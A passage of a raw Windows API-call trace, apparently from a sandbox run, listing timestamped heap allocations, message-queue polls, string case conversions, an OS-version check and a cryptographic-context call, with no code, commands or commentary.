0x24b1858 [0252.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0252.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0252.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0252.537] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.537] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0252.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0252.537] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.537] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0252.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0252.538] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.538] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.538] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.538] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.538] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.539] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.539] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0252.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0252.540] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.540] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0252.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0252.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.541] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.541] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.541] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0252.541] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.541] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0252.541] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.541] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.541] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.541] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.541] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.541] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.541] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0252.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0252.541] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.542] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.542] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0252.542] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.542] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0252.542] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0252.542] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0252.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0252.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.542] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad31c0) returned 1 [0252.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0252.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0252.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0252.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0252.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0252.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0252.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0252.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0252.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0252.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0252.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0252.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0252.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0252.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0252.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0252.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0252.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0252.547] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0252.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0252.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0252.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0252.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0252.548] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0252.549] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0252.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17a8 [0252.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0252.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 